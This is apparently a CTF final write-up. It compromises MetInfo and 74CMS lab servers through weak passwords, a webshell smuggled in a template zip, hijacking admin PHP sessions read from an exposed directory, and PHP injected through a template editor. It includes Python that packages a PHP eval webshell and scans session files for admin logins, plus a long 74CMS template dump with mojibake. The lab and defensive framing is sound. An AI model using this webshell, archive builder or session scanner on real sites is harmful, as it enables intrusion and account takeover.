Spent the whole day dragging a cold and a headache around. Writing this up, then straight to bed.
Today's final was split into:
- Morning: a "comprehensive penetration" (personally I'd call it a CTF), since by all appearances the three challenge servers could not reach one another.
- Afternoon: AWD (unsurprisingly, still only one challenge).
The morning penetration consisted of three CMSes: MetInfo 5.x, 騎士CMS (74CMS), and an easycms (I really don't remember the version numbers).
First challenge: MetInfo
- A flag in the cookie.
- A flag in robots.txt.
- Weak password (admin ---- MetInfo) gets into the admin panel.
- The admin panel has a template upload that only accepts zip and similar archives; the extension check is strict, but it applies to the archive itself only. The bundled templates are stored as many loose files, so it is a reasonable guess that the upload is unpacked server-side: put a PHP one-liner into a zip and upload it as a template. The .php was indeed extracted into the templates directory, getshell, straight into Caidao (China Chopper). This was a Windows box, which made things awkward at first, Orz, since I am not comfortable with Windows commands.
- A flag in the flag4 folder under the User directory.
- A flag under upload\file in the web root.
- One more whose location I forget: a file named flag5.png; hexdump revealed flag5.
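As an added illustration of the gap described above (not MetInfo's code, and not part of the original post), the following Python models an upload handler that validates only the archive's own extension and then unpacks it, beside one that validates every member before writing anything. The archive contents, file names and the allowed-extension list are constructed for the example.

```python
import io
import os
import posixpath
import tempfile
import zipfile

# Added example, not MetInfo's code. Models the upload flow in the writeup:
# the outer file must be .zip, but nothing checks what the zip contains, so
# a .php member is unpacked into the templates directory. The member
# whitelist below is an assumption, not MetInfo's real list.
ALLOWED_MEMBER_EXT = {".htm", ".html", ".css", ".js", ".png", ".jpg", ".gif", ".txt"}

# Constructed payload: the PHP one-liner, alongside an innocent template file.
WEBSHELL = b"<?php @eval($_POST['pass']); ?>"


def build_template_zip() -> bytes:
    """Build the 'template' archive an attacker would upload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mytheme/index.htm", b"<html><body>hello</body></html>")
        zf.writestr("mytheme/shell.php", WEBSHELL)
    return buf.getvalue()


def extract_unsafe(upload_name: str, zip_bytes: bytes, dest: str) -> list:
    """Vulnerable: checks only the uploaded file's extension, then extractall()."""
    if not upload_name.lower().endswith(".zip"):
        raise ValueError("only zip uploads allowed")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def extract_safe(upload_name: str, zip_bytes: bytes, dest: str) -> list:
    """Hardened: validate every member (extension and path) before writing any."""
    if not upload_name.lower().endswith(".zip"):
        raise ValueError("only zip uploads allowed")
    dest_real = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
        for m in members:
            name = m.filename
            norm = posixpath.normpath(name)
            # absolute paths, backslashes and '..' segments are zip-slip material
            if name.startswith("/") or "\\" in name or norm == ".." or norm.startswith("../"):
                raise ValueError(f"rejected path: {name}")
            if posixpath.splitext(norm)[1].lower() not in ALLOWED_MEMBER_EXT:
                raise ValueError(f"rejected member type: {name}")
            target = os.path.realpath(os.path.join(dest_real, norm))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError(f"rejected path: {name}")
        for m in members:  # every member validated; only now touch the disk
            target = os.path.join(dest_real, posixpath.normpath(m.filename))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(m) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(m.filename)
    return written


def demo() -> dict:
    """Run both extractors on the constructed archive in scratch directories."""
    payload = build_template_zip()
    unsafe_dir, safe_dir = tempfile.mkdtemp(), tempfile.mkdtemp()
    out = {"unsafe_members": extract_unsafe("theme.zip", payload, unsafe_dir)}
    out["unsafe_php_on_disk"] = os.path.exists(os.path.join(unsafe_dir, "mytheme", "shell.php"))
    try:
        extract_safe("theme.zip", payload, safe_dir)
        out["safe_error"] = None
    except ValueError as exc:
        out["safe_error"] = str(exc)
    out["safe_php_on_disk"] = os.path.exists(os.path.join(safe_dir, "mytheme", "shell.php"))
    return out
```

The hardened version validates the whole member list before extracting a single file, so a rejected archive leaves nothing behind; validating while extracting would already have written the innocent members by the time the .php is found.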
Second challenge: 騎士CMS
- Server misconfiguration exposes directory listings for folders without an index.php/index.html (the Apache `Options Indexes` setting in the `<Directory>` block).
- A flag in the cookie.
- A flag in robots.txt // apparently
- While walking the listings I found PHP's session storage directory. Looking through the files turned up a session carrying an admin record, so I set document.cookie="PHPSESSID=xxx" to that ID and was logged into the admin panel. (A session store readable through the web server makes every session file as good as the password that created it.)
- The admin panel has a template editor for the .htm files. They are full of mustache-style tags similar to Laravel's Blade engine, which I remembered as {{ }}; from the attached source they are actually Smarty tags with `{# ... #}` delimiters. Guessing that raw PHP would be passed straight through by the template compiler, I inserted
<?php phpinfo();?>
and it executed. From there: getshell and rummage for flags. Apache runs as the user apache.
- First, AAAAAAAAflag.txt in the web root gave a flag.
- Next, the filesystem root holds a /flag directory. It is mode 700 but owned by apache, so I ran chmod 777 on it, entered and read .flag.txt for a flag. (As the owner, apache could have entered it without the chmod; 700 already grants the owner rwx, so the chmod was unnecessary and only noisier.)
- Finally, find / -name flag turned up a flag directory under /var/lib/mysql/, this time owned by mysql with no read access for us. cat /etc/group showed mysql in a group of its own, which suggested privilege escalation, but I had not really done that before, so I gave up.
Part of the template source, for reference:
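As an added example, not 騎士CMS code and not part of the original post: a decoder for the session-file format this step relies on, plus a scan over a directory of session files that picks out the ones carrying an admin marker. PHP's default files handler with the php serializer writes each session as sess_<id> containing key|value pairs back to back, which is what the decoder parses. The marker key names and the three sample sessions are constructed for the example; against a real target you read the key names off its own files.

```python
import os
import tempfile

# Added example, not 騎士CMS code. PHP's default 'files' session handler
# stores each session as sess_<id>; with the default 'php' serializer the
# body is key|<serialized value> pairs written back to back. This decodes
# that format and flags sessions that look like admin logins. The key names
# treated as admin markers, and the sample sessions, are constructed for the
# example; a real target's keys come from its own session files.
ADMIN_KEYS = {"admin", "admin_name", "admin_id", "is_admin"}


def _parse_value(data: str, pos: int):
    """Parse one PHP-serialized value at pos; return (value, position after it)."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in ("i", "b", "d"):                       # i:42;  b:1;  d:1.5;
        end = data.index(";", pos)
        raw = data[pos + 2:end]
        val = int(raw) if t == "i" else (raw == "1" if t == "b" else float(raw))
        return val, end + 1
    if t == "s":                                   # s:5:"admin";  (length in bytes)
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:2:{key value key value}
        colon = data.index(":", pos + 2)
        count, p, out = int(data[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, p = _parse_value(data, p)
            out[key], p = _parse_value(data, p)
        return out, p + 1                          # skip }
    raise ValueError(f"unsupported type {t!r} at offset {pos}")


def decode_php_session(data: str) -> dict:
    """Decode a 'php'-serializer session body into a dict."""
    result, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        key = data[pos:bar]
        result[key], pos = _parse_value(data, bar + 1)
    return result


def find_admin_sessions(session_dir: str) -> list:
    """Return (session_id, decoded) for sess_* files that carry an admin marker."""
    hits = []
    for name in sorted(os.listdir(session_dir)):
        if not name.startswith("sess_"):
            continue
        with open(os.path.join(session_dir, name), "rb") as fh:
            data = fh.read().decode("latin-1")     # keeps byte lengths exact
        try:
            sess = decode_php_session(data)
        except (ValueError, IndexError):
            continue                               # not 'php'-serializer data
        if any((k in ADMIN_KEYS and v not in (None, "", 0, False)) or v == "admin"
               for k, v in sess.items()):
            hits.append((name[len("sess_"):], sess))
    return hits


def demo() -> list:
    """Write constructed session files to a scratch directory and scan them."""
    d = tempfile.mkdtemp()
    samples = {
        "a1b2c3": 'username|s:5:"guest";uid|i:42;cart|a:1:{i:0;s:3:"job";}',
        "d4e5f6": 'admin_name|s:4:"root";admin_id|i:1;login_time|i:1500000000;',
        "g7h8i9": 'username|s:5:"admin";is_admin|b:1;',
    }
    for sid, body in samples.items():
        with open(os.path.join(d, f"sess_{sid}"), "w", encoding="latin-1") as fh:
            fh.write(body)
    return find_admin_sessions(d)
```

The file name minus the sess_ prefix is exactly the value that goes into PHPSESSID; the decoder is needed because the string lengths in s:N:"..." are byte counts, so a naive split on ; breaks on any value that contains one.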
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />{#qishi_pageinfo set="列表名:page,調(diào)用:QS_index"#}
<title>Welcome 74CMS</title>
<meta name="description" content="{#$page.description#}">
<meta name="keywords" content="{#$page.keywords#}">
<meta http-equiv="X-UA-Compatible" content="edge">
<link rel="shortcut icon" href="{#$QISHI.site_dir#}favicon.ico" />
<meta name="author" content="騎士CMS" />
<meta name="copyright" content="74cms.com" />
<link href="{#$QISHI.site_template#}css/common.css" rel="stylesheet" type="text/css" />
<link href="{#$QISHI.site_template#}css/index.css" rel="stylesheet" type="text/css" />
<script src="{#$QISHI.site_template#}js/jquery.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/index_foucs.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.dropDownWidget.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.newindex.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.lazyload.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.autocomplete.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_dir#}data/cache_classify.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
// tab switching
$(".n-tab-control>a").each(function(){
$(this).click(function(){
$(this).addClass("select");
$(this).siblings("a").removeClass("select");
var bull_index = $(".n-tab-control>a").index(this);
$(".news-tab-box>ul").eq(bull_index).show().siblings().hide();
})
});
// login
$.get('{#$QISHI.site_dir#}plus/ajax_user.php?act=loginform', function(data) {
$("#ajax_login").html(data);
// choose login method
var wxrun = '';
$('.loginicon').toggle(function(){
$('#pcLogin').hide();
$('#codeLogin').show();
$('#login-box h1').html('微信登錄');
$(this).attr('title', '用戶名登錄');
$(this).removeClass('wx').addClass('pc');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
wxrun = window.setInterval(run, 5000);
function run(){
$.get("{#$QISHI.site_dir#}m/login.php?act=waiting_weixin_login",function(data){
if(data=="1"){
window.location="{#$QISHI.site_dir#}";
}
});
}
{#/if#}
}, function(){
$('#pcLogin').show();
$('#codeLogin').hide();
$('#login-box h1').html('會(huì)員登錄');
$(this).attr('title', '微信登錄');
$(this).removeClass('pc').addClass('wx');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
window.clearInterval(wxrun);
{#/if#}
});
});
// left-hand dropdown
$.dropDownWidget(".job-sort-wrap");
// some index-page JS
index("{#$QISHI.site_dir#}","{#$QISHI.site_template#}");
// populate work-location data
city_filldata("#city_list", QS_city_parent, QS_city, "#result-list-city", "#aui_outer_city", "#cityForIndexSearch", "#citycategory");
//
$('.floor-item:first').find('.floor-title').css({'margin-top':5});
$(".core-function").live('click', function(event) {
window.location.href = $(this).attr("code");
});
});
</script>
</head>
<body {#if $QISHI.body_bgimg#}style="background:url({#$QISHI.site_domain#}{#$QISHI.site_dir#}data/{#$QISHI.updir_images#}/{#$QISHI.body_bgimg#}) repeat-x center 38px;"{#/if#}>
{#include file="header.htm"#}
<!-- main body -->
<div class="container-index">
<div class="complex-main clearfix">
<div class="complex-left f-left">
<div class="job-sort-wrap">
<div class="job-sort-control">全部職位分類<i class="sotr-icon"></i></div>
<div class="job-sort-list"></div>
<div class="leftmenu_box"></div>
</div>
<div class="bolck-nav clearfix">
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}jobs" target="_blank">
<i class="b-nav-icon icon1"></i>
<p>找工作</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}resume" target="_blank">
<i class="b-nav-icon icon2"></i>
<p>找人才</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/company/company_jobs.php?act=addjobs" target="_blank">
<i class="b-nav-icon icon9"></i>
<p>發(fā)職位</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/personal/personal_resume.php?act=make1" target="_blank">
<i class="b-nav-icon icon4"></i>
<p>創(chuàng)簡(jiǎn)歷</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_simplelist"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon5"></i>
<p>微商圈</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_hrtoolsindex"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon6"></i>
<p>HR工具</p>
</a>
</div>
<div class="news-tab">
<div class="n-tab-control clearfix">
<a href="javascript:;" class="f-left tab-ctrl select">公告</a>
<a href="javascript:;" class="f-left tab-ctrl">資訊</a>
<a href="javascript:;" class="f-left tab-ctrl">幫助</a>
</div>
<div class="news-tab-box">
<!-- notices -->
<ul>
{#qishi_notice_list set="列表名:notice,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,分類:1,填補(bǔ)字符:..."#}
{#foreach from=$notice item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- news -->
<ul style="display: none;">
{#qishi_news_list set="列表名:news,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,分類:1,填補(bǔ)字符:...,排序:id>desc"#}
{#foreach from=$news item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- help -->
<ul style="display: none;">
{#qishi_help_list set="列表名:help,顯示數(shù)目:9,標(biāo)題長(zhǎng)度:12,填補(bǔ)字符:..."#}
{#foreach from=$help item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<div class="complex-center f-left">
<!-- search -->
<div class="search-wrap clearfix">
<div class="search-box f-left">
<div class="search-type f-left">
<div title="找工作" code="QS_jobslist" data="請(qǐng)輸入職位名稱或企業(yè)名稱" class="search-type-show"><span>找工作</span><i class="search-icon"></i></div>
<div title="找人才" code="QS_resumelist" data="請(qǐng)輸入簡(jiǎn)歷關(guān)鍵字" class="search-type-drop"><a href="javascript:;">找人才</a></div>
</div>
<div class="search-text f-left">
<input type="text" name="keyForIndexSearch" id="keyForIndexSearch" placeholder="請(qǐng)輸入職位名稱或企業(yè)名稱" />
</div>
</div>
<div class="search-box f-left">
<div class="search-area-box"><input type="text" name="cityForIndexSearch" id="cityForIndexSearch" placeholder="請(qǐng)輸入工作地區(qū)" /></div>
</div>
<div class="search-submit f-left"><input type="button" name="btnForIndexSearch" id="btnForIndexSearch" code="QS_jobslist" value="搜索" class="search-submit" /></div>
<input type="hidden" name="citycategory" id="citycategory" value="">
<!-- work-location popup -->
<div class="aui_outer" id="aui_outer_city">
<table class="aui_border">
<tbody>
<tr>
<td class="aui_c">
<div class="aui_inner">
<table class="aui_dialog">
<tbody>
<tr>
<td class="aui_main">
<div class="aui_content" style="padding: 0px;">
<div class="LocalDataMultiC" style="width:623px;">
<div class="selector-header"><span class="selector-title">選擇地區(qū)</span><div></div><span id="ct-selector-save" class="selector-save">確定</span><span class="selector-close">X</span><div class="clear"></div></div>
<div class="data-row-head"><div class="data-row"><div class="data-row-side data-row-side-c">最多選 <strong class="text-warning">3</strong> 項(xiàng) 已選 <strong id="arscity" class="text-warning">0</strong> 項(xiàng)</div><div id="result-list-city" class="result-list data-row-side-ra"></div></div><div class="cla"></div></div>
<div class="data-row-list data-row-main" id="city_list">
<!-- list content -->
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- work-location popup end -->
</div>
<!-- search end -->
<div class="swipe-wrap">
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexfocus,列表名:ad"#}
<div id="playBox">
<div class="pre"></div>
<div class="next"></div>
<div class="smalltitle">
<ul>
{#section loop=$ad name=list#}
<li {#if $smarty.section.list.first#}class="thistitle"{#/if#}></li>
{#/section#}
</ul>
</div>
<ul class="oUlplay">
{#foreach from=$ad item=list#}
<li><a href="{#$list.img_url#}" target="_blank"><img src="{#$list.img_path#}" /></a></li>
{#/foreach#}
</ul>
</div>
</div>
<div class="block-ad-wrap clearfix lazyload">
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexrecommend,列表名:ad"#}
{#if $ad#}
{#foreach from=$ad item=list#}
{#if $list.img_uid>0#}
<div class="block-ad-item f-left">
<div class="block-ad-logo"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
<div class="block-ad-info">
<h3><a href="{#$list.company_url#}" target="_blank">{#$list.companyname#}</a></h3>
<p><a href="{#$list.jobs.0.jobs_url#}" target="_blank">{#$list.jobs.0.jobs_name#}</a></p>
</div>
</div>
{#else#}
<div class="block-ad-item f-left">
<a href="{#$list.img_url#}" target="_blank">
<img src="{#$QISHI.site_template#}images/index/84.jpg" />
</a>
</div>
{#/if#}
{#/foreach#}
{#/if#}
</div>
</div>
<div class="complex-right f-left">
<div class="login-block" id="ajax_login">
<h4>會(huì)員登錄</h4>
<div class="login-wrap">
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon user f-left"></i><div class="login-input f-left"><input type="text" name="" id="" placeholder="郵箱/手機(jī)號(hào)/用戶名" /></div></div>
</div>
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon pass f-left"></i><div class="login-input f-left"><input type="password" name="" id="" placeholder="請(qǐng)輸入密碼" /></div></div>
</div>
<div class="login-item clearfix">
<label class="auto-login f-left"><input type="checkbox" name="" id="" />自動(dòng)登錄</label>
<a href="" class="forget underline f-right">忘記密碼忘晤?</a>
</div>
<div class="login-item clearfix">
<div class="login-btn-box f-left"><input type="button" value="立即登錄" class="index-login-btn" /></div>
<div class="f-left"><input type="button" value="免費(fèi)注冊(cè)" class="index-reg-btn" /></div>
</div>
<div class="third-login clearfix">
<span class="f-left">其他賬戶登錄:</span>
<a href="" class="third-icon qq f-left"></a><a href="" class="third-icon sina f-left"></a><a href="" class="third-icon taobao f-left"></a>
</div>
</div>
</div>
<div class="urgent-block" id="emergencybox">
<div class="urgent-title clearfix">
<h4 class="f-left">緊急招聘</h4>
<a href="{#"QS_jobs"|qishi_url#}" class="underline f-right" target="_blank">更多>></a>
</div>
<ul class="urgent-list">
{#qishi_jobs_list set="列表名:jobs,顯示數(shù)目:10,職位名長(zhǎng)度:12,企業(yè)名長(zhǎng)度:12,緊急招聘:1,排序:refreshtime>desc"#}
{#foreach from=$jobs item=list#}
<li class="clearfix"><a href="{#$list.company_url#}" class="u-com f-left underline" target="_blank">{#$list.companyname#}</a><a href="{#$list.jobs_url#}" class="u-job f-left underline" title="{#$list.jobs_name_#}" target="_blank">{#$list.jobs_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<!-- ad slot area -->
<div class="ad-area">
<!-- 1198*58 ad -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indextopimg,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
{#/if#}
<!-- 392*58 ad, grid ad -->
{#qishi_ad set="顯示數(shù)目:6,調(diào)用名稱:QS_indexcentreimg,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-row clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-31 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a>
{#if $list.jobs#}
<!-- shown on hover -->
<div class="ad-more-info info31" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div><div class="jobnarea f-left">{#$jobs_li.district_cn#}</div></li>
{#/foreach#}
</ul>
<div class="ad-com-info">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多內(nèi)容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 230x58 ad, grid ad -->
{#qishi_ad set="顯示數(shù)目:10,調(diào)用名稱:QS_indexcentreimg_230x58,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-row a23058d clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-51 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a>
{#if $list.jobs#}
<!-- shown on hover -->
<div class="ad-more-info info51" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div></li>
{#/foreach#}
</ul>
<div class="ad-com-info ad-com-info-w">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多內(nèi)容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
</div>
<!-- ad slot area end -->
<!-- list: recommended jobs -->
<div class="index-data-wrap index-data-wrap-i7">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">推薦職位<span>Recommended Job</span></h4>
<a href="{#"QS_helplist,id:10"|qishi_url#}" class="f-right underline" target="_blank">我是招聘單位,我想出現(xiàn)在這里</a>
</div>
<div class="famous-list clearfix">
{#qishi_companyjobs_list set="列表名:comjob_recommend,顯示數(shù)目:12,顯示職位:3,推薦:1,統(tǒng)計(jì)職位:1"#}
{#foreach from=$comjob_recommend item=list#}
<div class="famous-items f-left">
<i class="fc-icon"></i>
<div class="famous-com comtip">
<a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}{#if $QISHI.operation_mode>="2" && $list.setmeal_id>1 #} <img src="{#$QISHI.site_dir#}data/setmealimg/{#$list.setmeal_id#}.gif" />{#/if#}</a>
<div class="famous-more-info" style="display:none;">
<i class="fmi-icon"></i>
<div class="fmi-title">招聘崗位</div>
<ul class="fmi-list">
{#qishi_jobs_list set="列表名:com_jobs_all,顯示數(shù)目:3,會(huì)員UID:$list.uid"#}
{#foreach from=$com_jobs_all item=job_li#}
<li class="clearfix">
<div class="fmi-jobname f-left"><a href="{#$job_li.jobs_url#}" class="underline" target="_blank">{#$job_li.jobs_name#}</a></div><div class="fmi-time f-left"><span>{#$job_li.refreshtime_cn#}</span></div>
</li>
{#/foreach#}
</ul>
<p>該企業(yè)共有{#$list.jobs_num#}個(gè)職位，<a href="{#"QS_companyjobs,id:$list.company_id"|qishi_url#}" target="_blank" class="underline">查看全部</a></p>
</div>
</div>
<div class="famous-job">
{#foreach from=$list.jobs item=jobs_li#}
<span><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></span>
{#/foreach#}
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- list: featured employers end -->
<!-- 1198*58 ad -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indexcenter,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- list: latest jobs -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">最新職位<span>Latest Job</span></h4>
<a href="{#"QS_jobslist"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="newest-list clearfix">
{#qishi_companyjobs_list set="列表名:jobs,顯示數(shù)目:40,職位名長(zhǎng)度:12,顯示職位:1,企業(yè)名長(zhǎng)度:12,排序:rtime>desc"#}
{#foreach from=$jobs item=list#}
<div class="newest-items f-left">
<i class="nc-icon"></i>
<a href="{#$list.company_url#}" class="newest-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="newest-job underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
</div>
<!-- list: latest jobs end -->
<!-- 1198*58 ad -->
{#qishi_ad set="顯示數(shù)目:3,調(diào)用名稱:QS_indexfootbanner,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- list: photo resumes -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">照片簡(jiǎn)歷<span>Photo Resume</span></h4>
<a href="{#"QS_resumelist,photo:1"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="photo-list clearfix">
{#qishi_resume_list set="列表名:resume,顯示數(shù)目:7,照片:1,意向職位長(zhǎng)度:14,填補(bǔ)字符:...,排序:rtime>desc"#}
{#foreach from=$resume item=list#}
<div class="photo-items f-left">
<div class="avater-box">
<div class="avater"><a href="{#$list.resume_url#}" target="_blank"><img src="{#$list.photosrc#}" /></a></div>
<p><a href="{#$list.resume_url#}" target="_blank" class="underline">{#$list.fullname#}</a></p>
</div>
<div class="photo-info">
<p>{#$list.education_cn#},{#$list.experience_cn#}</p>
<p>{#$list.intention_jobs#}</p>
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- list: photo resumes end -->
<!-- list: job navigation -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">職位導(dǎo)航<span>Jobs Navigation</span></h4>
</div>
<div class="job-build">
<!-- floor 1 -->
<div class="floor-item">
<div class="floor-title"><em>1F</em><span>{#"QS_jobs,76"|qishi_categoryname#} · {#"QS_jobs,77"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- categories -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:76_77"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:74|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- jobs -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:76_77"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- ad: floor ad 1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="顯示數(shù)目:4,調(diào)用名稱:QS_floor_img1,列表名:ad,文字長(zhǎng)度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- floor 2 -->
<div class="floor-item">
<div class="floor-title"><em>2F</em><span>{#"QS_jobs,3"|qishi_categoryname#} · {#"QS_jobs,5"|qishi_categoryname#} · {#"QS_jobs,6"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- categories -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,類型:QS_jobs_floor,顯示數(shù)目:20,id:3_5_6"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:1|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- jobs -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,顯示數(shù)目:10,顯示職位:3,職位分類:3_5_6"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
